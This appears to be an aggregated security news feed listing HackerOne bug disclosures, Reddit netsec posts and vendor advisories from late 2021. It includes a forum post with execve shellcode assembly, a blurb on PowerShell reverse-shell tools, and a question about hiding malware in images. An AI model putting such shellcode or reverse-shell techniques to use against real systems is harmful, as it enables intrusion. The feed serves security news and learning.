    여러분들은 보안 테스팅 시 웹 브라우저 Addon 많이 사용하시나요? 저는 한 떄 엄청나게 많이 설치해서 사용했지만, 지금은 5개 미만을 유지하는 것 같네요. 오늘은 보안 테스팅 시 유용한 Addon을 소개하고 제가 어떤식으로 변화하며 사용했는지 공유드릴까 합니다. TLDR Name Firefox Chrome 😎 Darkreader Firefox Addons Chrome store 🎩 Eval Villian Firefox Addons, Github 🖥 postMessage-tracker Github 🍪 Cookie-quick-manager Firefox Addons, Github 🍪 Edit-This-Cookie Chrome store, Github 🗑 Clear cache Firefox Addons, Github Chrome store 👩🏽‍💻 JWT Debugger (Github) Firefox Addons Chrome store 변화 저는 예전에는 브라우저 Addon을 많이 사용 했었습니다.

  • Open

    Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021-44228) (Updated Dec. 28)
    We provide background and a root cause analysis of CVE-2021-44228, a remote code execution vulnerability in Apache log4j, and we recommend mitigations. The post Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021-44228) (Updated Dec. 28) appeared first on Unit42.
  • Open

    Five fundamental tips for getting executive buy-in on AppSec
    Demonstrating AppSec value to executives can be an uphill battle. This post show how, with the right metrics and planning, getting C-suite buy-in for application security can become much easier. READ MORE  ( 5 min )
  • Open

    Quick Guide: Go 1.18 Features
    With the Go 1.18 version, which is planned to be released in the first quarter of 2022, many new features are waiting for us. Continue reading on Medium »  ( 4 min )
    Go 1.18 ile Neler Geliyor?
    2022 yılının ilk çeyreğinde yayınlanması planlanan Go 1.18 versiyonuyla birlikte bizleri birçok yeni özellikler bekliyor. Continue reading on Medium »  ( 2 min )
  • Open

    Quick Guide: Go 1.18 Features
    With the Go 1.18 version, which is planned to be released in the first quarter of 2022, many new features are waiting for us. Continue reading on Medium »  ( 4 min )
    Go 1.18 ile Neler Geliyor?
    2022 yılının ilk çeyreğinde yayınlanması planlanan Go 1.18 versiyonuyla birlikte bizleri birçok yeni özellikler bekliyor. Continue reading on Medium »  ( 2 min )
  • Open

    Trivial RCE in log4j
    submitted by /u/dfv157 [link] [comments]
    Evasion Adventures
    submitted by /u/grandstream [link] [comments]
  • Open

    Looking for career advice
    Please remove this if it doesn't fit in with this sub, I'm asking here because this seems to be the most common place to discuss appsec. A little about myself: I'm currently working in a helpdesk role in Australia and have been practicing both offensive netsec and web application security/exploit dev for a little while. I like both netsec and appsec but netsec bores me a little bit and I really enjoy coding/learning about applications and exploiting them. The issue I'm having is that helpdesk work seems to line up nicely with network pentesting, and I don't have a degree or any development experience. But with that said I'd really enjoy doing application security as a career. Does anyone have any advice in regards to entering the application security world from a support role? Or would it be better for me to pursue network security and then try to switch to application security later? Also should I pursue any certs that might help? I've thought about OSWE in the future. Any advice would be great, and again if this post doesn't belong here I can delete. Thanks. submitted by /u/n3v327311 [link] [comments]  ( 2 min )

  • Open

    Endpoint without access control leads to order informations and status changes
    Azbuka Vkusa disclosed a bug submitted by cabelo: https://hackerone.com/reports/1050753 - Bounty: $1000
    Misconfiguration Certificate Authority Authorization Rule
    Sifchain disclosed a bug submitted by d4rk_r0s3: https://hackerone.com/reports/1186740
    Linux Desktop application "sifnoded" executable does not use Pie / no ASLR
    Sifchain disclosed a bug submitted by n33dm0n3y: https://hackerone.com/reports/1188633
    CORS (Cross-Origin Resource Sharing) origin validation failure
    Sifchain disclosed a bug submitted by 11holefinder: https://hackerone.com/reports/1192147
    Vulnerability : Email Spoofing
    Sifchain disclosed a bug submitted by tajammul: https://hackerone.com/reports/1180668
    No valid SPF record found
    Sifchain disclosed a bug submitted by tamilarasi11: https://hackerone.com/reports/1187001
    Username disclosure at Main Domain
    Sifchain disclosed a bug submitted by n33dm0n3y: https://hackerone.com/reports/1188662
    Design Issues at Main Domain
    Sifchain disclosed a bug submitted by n33dm0n3y: https://hackerone.com/reports/1188652
    No Rate Limit in email leads to huge Mass mailings
    Sifchain disclosed a bug submitted by sudhakarsurya: https://hackerone.com/reports/1185903
    Information Disclosure at one of your subdomain
    Sifchain disclosed a bug submitted by omemishra: https://hackerone.com/reports/1195423
    Sifchain Privacy Policy Webpage Uses Wordpress Default Template. Does Not Display Correct Privacy Policy.
    Sifchain disclosed a bug submitted by masq31: https://hackerone.com/reports/1196049
    Clickjacking /framing on sensitive Subdomain
    Sifchain disclosed a bug submitted by ilxax1: https://hackerone.com/reports/1195209
    No Valid SPF Records at sifchain.finance
    Sifchain disclosed a bug submitted by n33dm0n3y: https://hackerone.com/reports/1188725
    Session Token in URL
    Sifchain disclosed a bug submitted by little_one: https://hackerone.com/reports/1197078
    CSRF in newsletter form
    Sifchain disclosed a bug submitted by ph0b0s: https://hackerone.com/reports/1190705
    Wrong Implementation of Url in https://docs.sifchain.finance/
    Sifchain disclosed a bug submitted by sar00n: https://hackerone.com/reports/1198877
    Wrong Url in Main page of sifchain.finance
    Sifchain disclosed a bug submitted by beebeek: https://hackerone.com/reports/1195512
    Clickjacking at sifchain.finance
    Sifchain disclosed a bug submitted by manjithgowthaman: https://hackerone.com/reports/1212595
    clickjacking vulnerability
    Sifchain disclosed a bug submitted by sravani_1234: https://hackerone.com/reports/1199904
    Clickjacking
    Sifchain disclosed a bug submitted by v_t: https://hackerone.com/reports/1206138
    information disclosure
    Sifchain disclosed a bug submitted by virus26: https://hackerone.com/reports/1218784
    Possible Database Details stored in values.yaml
    Sifchain disclosed a bug submitted by sparta5537: https://hackerone.com/reports/1199803
    Sifchain token leak
    Sifchain disclosed a bug submitted by abdullah321: https://hackerone.com/reports/1188938
    ETHEREUM_PRIVATE_KEY leaked via github
    Sifchain disclosed a bug submitted by bugkillerak: https://hackerone.com/reports/1283605
    4 xss vulnerability dom based cwe 79 ; wordpress bootstrap.min.js is vulnerable
    Sifchain disclosed a bug submitted by rao_ji1hackerone: https://hackerone.com/reports/1219002
    Signature Verification /// golang.org/x/crypto/ssh
    Sifchain disclosed a bug submitted by dpredrag: https://hackerone.com/reports/1276384
    Origin IP Disclosure Vulnerability
    Sifchain disclosed a bug submitted by uniquekamboj6738: https://hackerone.com/reports/1327443
    Dependency Confusion Vulnerability in Sifnode Due to Unclaimed npm Packages.
    Sifchain disclosed a bug submitted by 0xcachefl0w: https://hackerone.com/reports/1187816
    Email Spoofing bug
    Sifchain disclosed a bug submitted by niloychowdhury3: https://hackerone.com/reports/1176090
    [34.96.80.155] Server Logs Disclosure lead to Information Leakage
    Evernote disclosed a bug submitted by huntinex: https://hackerone.com/reports/1398270 - Bounty: $150
    Exposed kubernetes dashboard
    8x8 disclosed a bug submitted by bugkill3r: https://hackerone.com/reports/1418101
  • Open

    Chrome on Windows performance improvements and the journey of Native Window Occlusion
    Whether you prefer organizing your browser with tab groups, naming your windows, tab search, or another method, you have lots of features that help you get to the tabs you want. In this The Fast and the Curious post, we describe how we use what windows are visible to you to optimize Chrome, leading to 25.8% faster start up and 4.5% fewer crashes. Background For several years, to improve the user experience, Chrome has lowered the priority of background tabs[1]. For example, JavaScript is throttled in background tabs, and these tabs don’t render web content. This reduces CPU, GPU and memory usage, which leaves more memory, CPU and GPU for foreground tabs that the user actually sees. However, the logic was limited to tabs that weren't focused in their window, or windows that were minimiz…
  • Open

    Detecting Patient Zero Web Threats in Real Time With Advanced URL Filtering
    Patient zero web threats are malicious URLs that are being seen for the first time. We discuss how to stop them despite attacker cloaking techniques. The post Detecting Patient Zero Web Threats in Real Time With Advanced URL Filtering appeared first on Unit42.

  • Open

    State of the Subreddit #3
    Greetings everyone in r/asknetsec, I hope everyone is doing well and getting ready for the holidays. All the moderators here wish you a relaxing and safe time with your families and friends. Hopefully we all will get a breather from the crazy world of Cyber Security and Networking. A couple of updates right off the bat – We’ve noticed an uptick in traffic for the subreddit over the past couple of months. Page views are up roughly 35% since the all-time lows of June-July when the subreddit was locked from the original admin. We are very happy with the increase, as it allows more collaboration and questions to be answered. Survey requests are no longer accepted on the subreddit going forward. We had a bit of a conversation internally on this topic as they seem to come up once or twice a week. Usually these are from college students requesting information for a class or study. We wish to continue and help anyone in school to best of our ability, but most of the time these surveys results are not shared publicly, and only benefit the survey creator. Due to this we don’t see it beneficial to include them. We’ve added surveys to rule 2 of what is relevant to the subreddit. Going into the new year, we hope to start providing everyone with some AMAs from verified industry professionals. We’ve been talking about this internally for a bit. State of the subreddit posts will most likely continue once every quarter (3 months). Thanks to everyone for continuing to contribute to the subreddit and continuing to report posts that break the rules. Even if you are unsure, your reports are appreciated. Have a fantastic holiday, and if you need anything, don’t hesitate to reach out to us directly. -AskNetSec Mod Team submitted by /u/Envyforme [link] [comments]  ( 1 min )
  • Open

    Process Ghosting - EDR Evasion
    submitted by /u/netbiosX [link] [comments]  ( 1 min )
    FIN13: A Cybercriminal Threat Actor Focused on Mexico
    submitted by /u/dmchell [link] [comments]
    Multiple Vulnerabilities in AWS and Other Major Cloud Services
    submitted by /u/GHIDRAdev [link] [comments]
  • Open

    [Transportation Management Services Solution 2.0] Improper authorization at tmss.gsa.gov leads to data exposure of all registered users
    U.S. General Services Administration disclosed a bug submitted by alexandrio: https://hackerone.com/reports/1175980
    php info file and sql backup at vendor's subdomain
    Semrush disclosed a bug submitted by rivalsec: https://hackerone.com/reports/1358249 - Bounty: $200
    Account Takeover through registration to the same email address
    QIWI disclosed a bug submitted by avolume: https://hackerone.com/reports/1224008 - Bounty: $100
    [allods.mail.ru] - WebCache Poisoning Host Header lead to Potential Stored XSS
    Mail.ru disclosed a bug submitted by 0xd0ff9: https://hackerone.com/reports/1262408

  • Open

    Explore Hackthebox Walkthrough
    “Explore” is a Capture the Flag challenge that we’ll be solving today. (HTB) Hack the Box is where you can get your hands on one, The post Explore Hackthebox Walkthrough appeared first on Hacking Articles.  ( 4 min )
  • Open

    Explore Hackthebox Walkthrough
    “Explore” is a Capture the Flag challenge that we’ll be solving today. (HTB) Hack the Box is where you can get your hands on one, The post Explore Hackthebox Walkthrough appeared first on Hacking Articles.  ( 4 min )
  • Open

    CORS origin validation failure
    UPchieve disclosed a bug submitted by jupiter-47: https://hackerone.com/reports/1404986
    Authentication Bypass - Email Verification code bypass in account registration process.
    UPchieve disclosed a bug submitted by anas_44: https://hackerone.com/reports/1406471
    Bypass a fix for report #708013
    Shopify disclosed a bug submitted by scaramouche31: https://hackerone.com/reports/1363672 - Bounty: $3500
    Guard WKS lookup: Evil WKS server forces connections to last forever
    Open-Xchange disclosed a bug submitted by afewgoats: https://hackerone.com/reports/1016691 - Bounty: $444
    Blind XSS
    Rocket.Chat disclosed a bug submitted by cyberasset: https://hackerone.com/reports/1091118
  • Open

    【安全通报】Grafana 未授权任意文件读取 0day 漏洞
    近日,网络上出现 Grafana 未授权任意文件读取的 0day 漏洞,漏洞细节暂未公开。攻击者可通过该漏洞在未经身份验证的情况下读取主机上的任意文件。  ( 1 min )
  • Open

    【安全通报】Grafana 未授权任意文件读取 0day 漏洞
    近日,网络上出现 Grafana 未授权任意文件读取的 0day 漏洞,漏洞细节暂未公开。攻击者可通过该漏洞在未经身份验证的情况下读取主机上的任意文件。  ( 1 min )
  • Open

    WHY fuzzers MISSED this buffer-overflow in Mozilla NSS library? 🤦‍♂️ (CVE-2021-43527 explained)
    submitted by /u/pat_ventuzelo [link] [comments]
  • Open

    NICKEL targeting government organizations across Latin America and Europe - Microsoft Security Blog
    submitted by /u/dmchell [link] [comments]
    Suspected Russian Activity Targeting Government and Business Entities Around the Globe
    submitted by /u/dmchell [link] [comments]
  • Open

    Introduction to GraphQL API security
    GraphQL is a data query and manipulation language for building APIs that is quickly gaining popularity. While it comes with built-in validation and type-checking, it also has its share of security shortcomings that attackers can exploit to access sensitive data. READ MORE  ( 6 min )

  • Open

    Full read SSRF in www.evernote.com that can leak aws metadata and local file inclusion
    Evernote disclosed a bug submitted by neolexsecurity: https://hackerone.com/reports/1189367 - Bounty: $5000
    IDOR to view order information of users and personal information
    Affirm disclosed a bug submitted by xfiltrer: https://hackerone.com/reports/1323406 - Bounty: $500
    xss is triggered on your web
    Shopify disclosed a bug submitted by jaka_tingkir: https://hackerone.com/reports/1121900 - Bounty: $2900
    [h1-2102] Wholesale - CSRF to Generate Invitation Token for a Customer and Move Customer to Invited Status
    Shopify disclosed a bug submitted by rhynorater: https://hackerone.com/reports/1091209 - Bounty: $500
  • Open

    Detection and Response for Linux Reflective Code Loading Malware— This is How
    submitted by /u/elixirelixir [link] [comments]
    Reflective Code Loading in Linux — A New Defense Evasion Technique in MITRE ATT&CK v10
    submitted by /u/elixirelixir [link] [comments]
  • Open

    How is timeless debugging ( reverse debugging ) good? Insight needed
    Any statistical data would be really appreciated. Thanks in advance. submitted by /u/h3ll0-fr13nd [link] [comments]  ( 1 min )
  • Open

    ZAP RootCA를 API와 Cli-Arguments로 제어하기
    ZAP에 새로운 Addon이 추가됬습니다. 이 Addon을 이용하면 ZAP의 인증서, 즉 Root CA를 API나 Cli등으로 컨트롤할 수 있도록 기능이 지원됩니다. 이를 활용하면 Daemon 모드로 동작하거나 CI/CD Pipeline 등에서 사용 시 조금 더 쉽게 인증서 처리를 할 수 있게 됩니다. 오늘은 ZAP의 RootCA, 즉 인증서를 API/CLI의 Arguments 등으로 쉽게 처리할 수 있는 Network addon과 어떻게 동작하는지 알아보도록 합시다 🚀 Network addon Network addon은 특별한 기능이 있는 Addon은 아니고, ZAP의 Certificate 지원을 위해 추가된 Addon 입니다.

  • Open

    [译] Facebook 流量路由最佳实践:从公网入口到内网业务的全路径 XDP/BPF 基础设施(LPC, 2021)
    译者序 本文翻译自 Facebook 在 LPC 2021 大会上的一篇分享: From XDP to Socket: Routing of packets beyond XDP with BPF。 标题可直译为《从 XDP 到 Socket 的(全路径)流量路由:XDP 不够,BPF 来凑》,因为 XDP 运行 在网卡上,而且在边界和流量入口,再往后的路径(尤其是到了内核协议栈)它就管不 到了,所以引入了其他一些 BPF 技术来“接力”这个路由过程。另外, 这里的“路由”并非狭义的路由器三层路由,而是泛指 L3-L7 流量转发。 翻译时加了一些链接和代码片段,以更方便理解。 由于译者水平有限,本文不免存在遗漏或错误之处。如有疑问,请查阅原文。 以下是译文。 译者序 1 引言 1.1 前期工作 1.2 Facebook 流量基础设施 1.3 面临的挑战 2 选择后端主机:数据中心内流量的一致性与无状态路由(四层负载均衡) 2.1 Katran (L4LB) 负载均衡机制 2.2 一致性哈希的局限性 2.2.1 容错性:后端故障对非相关连接的扰动 2.2.2 TCP 长连接面临的问题 2.2.3 QUIC 协议为什么不受影响 connection_id 完全无状态四层路由 2.3 TCP 连接解决方案:利用 BPF 将 backend server 信息嵌入 TCP Header 2.3.1 原理和流程 2.3.2 开销 数据开销:TCP header 增加 6 个字节 运行时开销:不明显 2.3.3 实现细节 监听的 socket 事件 维护 TCP flow -> server_id 的映射 server_id 的分配和同步 2.3.4 效果 2.3.5…

  • Open

    Invoke-PSImage PowerShell Class Project
    A partner and I are in charge of creating a class exercise to show examples of steganography and potential malware. With some research, we discovered Invoke-PSImage on GitHub (GitHub Link). We want to just show how to first input a secret message via steganography with PowerShell and then show how you can input "safe" malware like opening a youtube link from opening the image. So far it isn't working and online tutorials haven't been much help. Does anyone have any experience with this module or know of any other tools that we could use? It is also due tonight 😂 submitted by /u/zacattac1 [link] [comments]  ( 1 min )
  • Open

    Recaptcha Secret key Leaked
    Paragon Initiative Enterprises disclosed a bug submitted by kashifinfo90: https://hackerone.com/reports/1416665
    Authenticated kubernetes principal with restricted permissions can retrieve ingress-nginx serviceaccount token and secrets across all namespaces
    Kubernetes disclosed a bug submitted by libio: https://hackerone.com/reports/1249583 - Bounty: $2500
    Staff can use BULK_OPERATIONS_FINISH webhook topic using Graphql without permissions all
    Shopify disclosed a bug submitted by yinvi777: https://hackerone.com/reports/1350095 - Bounty: $600
  • Open

    TryHackMe | Beginner | Advent of Cyber 3 (2021) | Web Exploitation | Fuzzing in Burp Suite |…
    Today we will understand how to Fuzz using Burp Suite. On Day 3, we had used dirbuster for the same purpose. Continue reading on Medium »  ( 2 min )
  • Open

    TryHackMe | Beginner | Advent of Cyber 3 (2021) | Web Exploitation | Fuzzing in Burp Suite |…
    Today we will understand how to Fuzz using Burp Suite. On Day 3, we had used dirbuster for the same purpose. Continue reading on Medium »  ( 2 min )

  • Open

    reflected xss on the path m.tiktok.com
    TikTok disclosed a bug submitted by semsem123: https://hackerone.com/reports/1394440 - Bounty: $1000
    IDOR the ability to view support tickets of any user on seller platform
    TikTok disclosed a bug submitted by lewaperbb: https://hackerone.com/reports/1392630 - Bounty: $2500
    [h1-2102] [Yaworski's Broskis] Suspected overcharge and chargebacks in PoS
    Shopify disclosed a bug submitted by c0rv4x: https://hackerone.com/reports/1089978 - Bounty: $500
    access to stack memory beyond array boundaries
    Open-Xchange disclosed a bug submitted by ihsinme: https://hackerone.com/reports/796555 - Bounty: $400
    File System Monitoring Queue Overflow
    ownCloud disclosed a bug submitted by ihsinme: https://hackerone.com/reports/881891
    Ability to add address without being an admin or staff in the store via wholesale store
    Shopify disclosed a bug submitted by hydraxanon82: https://hackerone.com/reports/1279322 - Bounty: $500
    Unathorised access to admin endpoint on plus-website-staging5.shopifycloud.com
    Shopify disclosed a bug submitted by j0j0: https://hackerone.com/reports/1394982 - Bounty: $2900
  • Open

    Dynamic instrumentation of a C binary
    I am (a Frida noob) trying to write a script for Frida to capture and modify variables inside a C function. The code for my binary looks like this: int myfunc(int dummy) { return --dummy; } int main () { ... printf("%d\n", myfunc(15)); return 0; } My javascript looks like this: var myfunc_ptr = Module.findExportByName(null, "myfunc") Interceptor.attach(myfunc_ptr, { onEnter: function(args) { const source_string = args[0].readUtf8String(); console.log(source_string); args[0].writeUtf8String("999"); }, onLeave: function(retval) { // by now do nothing. } }) But it fails to update the value. Any help is appreciated ! :) submitted by /u/www_devharsh_me [link] [comments]  ( 1 min )
  • Open

    PowerShell for Pentester: Windows Reverse Shell
    Today, we’ll explore how to acquire a reverse shell using Powershell scripts on the Windows platform. Table of Content Powercat Invoke-PowerShellTcp (Nishang) ConPtyShell Mini-reverse PowerShell The post PowerShell for Pentester: Windows Reverse Shell appeared first on Hacking Articles.  ( 7 min )
  • Open

    PowerShell for Pentester: Windows Reverse Shell
    Today, we’ll explore how to acquire a reverse shell using Powershell scripts on the Windows platform. Table of Content Powercat Invoke-PowerShellTcp (Nishang) ConPtyShell Mini-reverse PowerShell The post PowerShell for Pentester: Windows Reverse Shell appeared first on Hacking Articles.  ( 7 min )
  • Open

    XMGoat - An Open Source Pentesting Tool for Azure - XM Cyber
    submitted by /u/dmchell [link] [comments]

  • Open

    Stored XSS in files.slack.com
    Slack disclosed a bug submitted by oskarsv: https://hackerone.com/reports/827606 - Bounty: $1000
    Bypassing HTML filter in "Packing Slip Template" Lead to SSRF to Internal Kubernetes Endpoints
    Shopify disclosed a bug submitted by cthulhufhtagn: https://hackerone.com/reports/1115139 - Bounty: $500
    CSS injection via link tag whitelisted-domain bypass - https://www.glassdoor.com
    Glassdoor disclosed a bug submitted by zonduu: https://hackerone.com/reports/1250730 - Bounty: $100
    account takeover through password reset in url https://reklama.tochka.com/
    QIWI disclosed a bug submitted by anonymouus: https://hackerone.com/reports/1379842 - Bounty: $500
  • Open

    The mystery of the missing Mac release
    Some eagle-eyed users of Burp Suite have noticed that there is no Mac release of Burp Suite 2021.10.2. Why is this release missing in action? Well, the true story is rather mundane, and unfortunate. F  ( 2 min )
  • Open

    The mystery of the missing Mac release
    Some eagle-eyed users of Burp Suite have noticed that there is no Mac release of Burp Suite 2021.10.2. Why is this release missing in action? Well, the true story is rather mundane, and unfortunate. F  ( 2 min )
  • Open

    December 2021 update for Netsparker Enterprise On-Premises
    This blog post announces the December 2021 update for Netsparker Enterprise On-Premises, highlighting tagging, a login warning banner, encryption, and the integrations with ServiceNow Vulnerability Management and DefectDojo. READ MORE  ( 2 min )
  • Open

    APT Expands Attack on ManageEngine With Active Campaign Against ServiceDesk Plus
    A persistent and determined APT actor has expanded beyond Zoho ManageEngine ADSelfService Plus and begun an active campaign against ServiceDesk Plus. The post APT Expands Attack on ManageEngine With Active Campaign Against ServiceDesk Plus appeared first on Unit42.

  • Open

    Injection is the New Black: Novel RTF Template Inject Technique Poised for Widespread Adoption Beyond APT Actors
    submitted by /u/dmchell [link] [comments]
    Tracking a P2P network related to TA505
    submitted by /u/dmchell [link] [comments]
  • Open

    【安全通报】惠普多功能打印机多个高危漏洞(CVE-2021-3923...
    近日,惠普多功能打印机多个高危漏洞(CVE-2021-39237&CVE-2021-39238)细节公开,惠普官方曾于11月1日发布安全公告。攻击者可利用这些漏洞获取敏感信息、进行远...
  • Open

    【安全通报】惠普多功能打印机多个高危漏洞(CVE-2021-3923...
    近日,惠普多功能打印机多个高危漏洞(CVE-2021-39237&CVE-2021-39238)细节公开,惠普官方曾于11月1日发布安全公告。攻击者可利用这些漏洞获取敏感信息、进行远...
  • Open

    Faster Chrome - Let The Compiler do the work
    Chrome is fast, but there's always room for improvement. Often, that's achieved by carefully crafting the algorithms that make up Chrome. But there's a lot of Chrome, so why not let computers do at least some part of our work? In this installment of The Fast And the Curious, we'll show you several changes in how we build Chrome to achieve a 25.8% higher score on Speedometer on Windows and a 22.0% increase in browser responsiveness. Why speed? So why do we care about performance benchmarks? It's not a simple "higher numbers is better" chasing of achievements - performance was so important to Chrome that we embedded in our core principles, the "4Ss" - Speed, Security, Stability, Simplicity. And speed matters because we want a browser that responds quickly. Speed matters so much because we…
  • Open

    Welley Christ is trending as the world’s perfect man and he needs a deal for a record label and…
    Making millions have been a problem for Welley Christ he needs a record label viral topic about Welley Christ trending topic about Welley… Continue reading on Medium »  ( 1 min )
  • Open

    Is passing data to a driver a collection of loads/Mov instructions?
    submitted by /u/WillyRaezer [link] [comments]
    Android touch input spoofing?
    How could I spoof the input to the touch screen on any app using regular code and not already root? submitted by /u/WillyRaezer [link] [comments]
  • Open

    Play Your Cards Right: Detecting Wildcard DNS Abuse
    Wildcard DNS records can be used constructively, but their flexibility also provides attackers with a variety of options for executing attacks. The post Play Your Cards Right: Detecting Wildcard DNS Abuse appeared first on Unit42.
  • Open

    The SANS/CWE Top 25 dangerous software errors of 2021
    Since we last looked at it in 2019, the SANS/CWE Top 25 list has been updated twice. Let’s see what this year’s SANS Top 25 tells us about the state of software security in 2021 and how it relates to the latest OWASP Top 10. READ MORE  ( 6 min )
  • Open

    Privilege Escalation leads to trash other users comment without having admin rights.
    Basecamp disclosed a bug submitted by fuzzsqlb0f: https://hackerone.com/reports/1307943 - Bounty: $200
    Stored XSS on https://community.my.games/ (Add Post)
    Mail.ru disclosed a bug submitted by c1kada: https://hackerone.com/reports/755322
    Reflected XSS in photogallery component on [https://market.av.ru]
    Azbuka Vkusa disclosed a bug submitted by haxta4ok00: https://hackerone.com/reports/988271 - Bounty: $100
    .....
    VK.com disclosed a bug submitted by executor: https://hackerone.com/reports/505336 - Bounty: $200

  • Open

    CVE-2021-22205 GitLab RCE之未授权访问深入分析(一)
    查看公众号原文 前言 安全研究员vakzz于4月7日在hackerone上提交了一个关于gitlab的RCE漏洞,在当时并没有提及是否需要登录gitlab进行授权利用,在10月25日该漏洞被国外安全公司通过日志分析发现未授权的在野利用,并发现了新的利用方式。根据官方漏洞通告页面得知安全的版本为13.10.3、13.9.6 和 13.8.8。我将分篇深入分析该漏洞的形成以及触发和利用。本篇将复现分析携带恶意文件的请求是如何通过gitlab传递到exiftool进行解析的,接下来将分析exiftool漏洞的原理和最后的触发利用。预计会有两到三篇。希望读者能读有所得,从中收获到自己独特的见解。在本篇文章的编写中要感谢@chybeta和@rebirthwyw两位师傅和团队内的师傅给予的帮助,他们的文章和指点给予了我许多好的思路。 gitlab介绍 GitLab是由GitLabInc.开发,使用MIT许可证的基于网络的Git仓库管理工具,且具有wiki和issue跟踪功能。使用Git作为代码管理工具,并在此基础上搭建起来的web服务。 GitLab由乌克兰程序员DmitriyZaporozhets和ValerySizov开发。后端框架采用的是Ruby on Rails,它使用Ruby语言写成。后来,一些部分用Go语言重写。gitlab-ce即为社区免费版,gitlab-ee为企业收费版。下面附上两张GitLab的单机部署架构图介绍其相应组件。 可以看到在gitlab的组成中包含的各种组件,可以通过两个关键入口访问,分别是HTTP/HTTPS(TCP 80,443)和SSH(TCP 22),请求通过nginx转发到Workhorse,然后Workhorse和Puma进行交互,这里我们着重介绍下通过Web访问的组件GitLab Workhorse。 …

  • Open

    【安全通报】泛微E-Office文件上传漏洞(CNVD-2021-49104)
    近日,网络上出现 泛微E-Office 文件上传漏洞(CNVD-2021-49104)在野利用事件,攻击者可通过该漏洞在影响...
  • Open

    【安全通报】泛微E-Office文件上传漏洞(CNVD-2021-49104)
    近日,网络上出现 泛微E-Office 文件上传漏洞(CNVD-2021-49104)在野利用事件,攻击者可通过该漏洞在影响...
  • Open

    Paid CTF partner
    Hi, Am doing a couple of CTFs next Sunday and Monday, and I have a shortage in Pwn and reverse fields. If you're interested in helping me through the CTF in these challenges and earning some quick money for each one you help solve, let me know or message me. Note : I can cover all other categories, and know the basics of pwn and reverse but I don't have a team that's why am asking for help. and as I know everyone is busy working or studying, I offered money for each challenge solved so it doesn't become waste of time for whoever wanna help. submitted by /u/riskyg33k [link] [comments]  ( 1 min )
  • Open

    AbuseHumanDB — HackTheBox Write-Up
    En el primer post de este blog vamos a examinar un challenge de Hack The Box llamado “AbuseHumanDB” y como efectuar un Blind XS Leak+ CORS… Continue reading on Medium »  ( 2 min )

  • Open

    Execve shellcode not working
    global _start start: ; =================== EXECVE ====================== ; https://chromium.googlesource.com/chromiumos/docs/+/master/constants/syscalls.md xor eax, eax mov al, 11 ; execve sys call no 11 xor edx, edx ; reverse the command string and store it /bin/bash/0 push edx ; push the null of the string push 0x686c6c61 ; this shit represent ls -allh in reverse and connverted to hex push 0x2d20736c mov ebx, esp ;sec arg to the execve is the pointer to the strin to execve mov ecx, edx ; mov 3rd arg to execve can be null int 0x80 ;================= EXIT PROGRAM ===================== ; exit = sys call no 1 -> must go to eax ; args to sys call is return code of the program -> must go to ebx ;xor eax, eax ; eax = 0 ;add eax, 1 ; eax = 1 ;xor ebx, ebx ; ebx = 0 ;add bl, 4 ;inc ebx ;int 0x80 see the push edx then next 2 instruction, its a command ls -allh command this command isnt executing, but /bin//sh is working with this. is their any problem with this. running program, sh is a program too its working but ls with args. ;;;;;; after compiling and dumping with objdump ;;;;;;;;; ld: warning: cannot find entry symbol _start; defaulting to 0000000008049000 f_output: file format elf32-i386 Disassembly of section .text: 08049000 : 8049000: 31 c0 xor eax,eax 8049002: b0 0b mov al,0xb 8049004: 31 d2 xor edx,edx 8049006: 52 push edx 8049007: 68 61 6c 6c 68 push 0x686c6c61 804900c: 68 6c 73 20 2d push 0x2d20736c 8049011: 89 e3 mov ebx,esp 8049013: 89 d1 mov ecx,edx 8049015: cd 80 int 0x80 ​ submitted by /u/dude_sourav [link] [comments]  ( 3 min )
  • Open

    Threat Hunting, IRL
    While I worked for one company, I did a lot of public speaking on the value of threat hunting. During these events, I met a lot of folks who were interested to learn what "threat hunting" was, and how it could be of value to them. I live in a very rural area, on just shy of 19 acres. One neighbor has 15 acres up front and another 20 in the back, and he adjoins a large property with just a trailer. My neighbor on the other side has 19 acres of...just 19 acres. We have animals, as well as more than a few visitors, which makes for a great analogy for threat hunting. Within the borders of my property, we have three horses and a mini-donkey, and we have different paddocks and fields for them. We can restrict them to certain areas, or allow them to roam freely. We do this at different times o…  ( 6 min )

  • Open

    New differential fuzzing tool reveals novel HTTP request smuggling techniques
    Article URL: https://portswigger.net/daily-swig/new-differential-fuzzing-tool-reveals-novel-http-request-smuggling-techniques Comments URL: https://news.ycombinator.com/item?id=29342944 Points: 169 # Comments: 33  ( 4 min )

  • Open

    Long names and muscle memory?
    Hi I have a general programming question, I have tendency to like short and sweet code, but many platforms/libraries have more obtuse names etc. Is it common to build muscle memory when typing out longer names etc.? I noticed Windows land code is pretty obtuse. submitted by /u/WillyRaezer [link] [comments]  ( 1 min )
  • Open

    Building a secure SDLC for web applications
    A predictable and efficient software development lifecycle (SDLC) is crucial for delivering modern web applications on schedule, in scope, and within budget. Building security into the application lifecycle is not an easy task, so let’s see how you can integrate application security best practices to create a secure software development life cycle. READ MORE  ( 6 min )
  • Open

    [译] 为 K8s workload 引入的一些 BPF datapath 扩展(LPC, 2021)
    译者序 本文翻译自 LPC 2021 的一篇分享: BPF datapath extensions for K8s workloads。 作者 Daniel Borkmann 和 Martynas Pumputis 都是 Cilium 的核心开发。 翻译时补充了一些背景知识、代码片段和链接,以方便理解。 翻译已获得作者授权。 由于译者水平有限,本文不免存在遗漏或错误之处。如有疑问,请查阅原文。 以下是译文。 译者序 0 引言 0.1 Cilium datapath 基础 0.2 Cilium datapath 几个新变化 0.3 本文提纲 1 cgroup v1/v2 干扰问题 1.1 普通节点:v1/v2 同时挂载没问题 1.2 嵌套虚拟化节点 1.2.1 KIND (K8s-In-Docker) 1.2.2 KIND-worker-node cgroup layout 1.2.3 带来的问题 1.3 问题分析:历史代码假设 v1/v2 不会同时启用 1.4 解决方案:v1/v2 字段拆开 2 TCP Pacing 2.0 基础 2.0.1 TCP Pacing(在每个 RTT 窗口内均匀发送数据) 2.0.2 TCP BBR 算法 2.0.3 tc FQ (Fair Queue) 2.1 K8s pod 限速 2.2 Cilium 中 pod egress 限速的实现 2.3 下一步计划:支持 TCP Pacing & BBR 2.3.1 目前无法支持的原因:跨 netns 导致 skb 时间戳被重置 2.3.2 为什么跨 netns 时,skb->tstamp 要被重置 2.3.3 能将 skb->tstamp 统一到同一种时钟吗? 2.4 中场 Q&A 环节 问题 1:net_t…

  • Open

    Tips for DFIR Analysts, pt. V
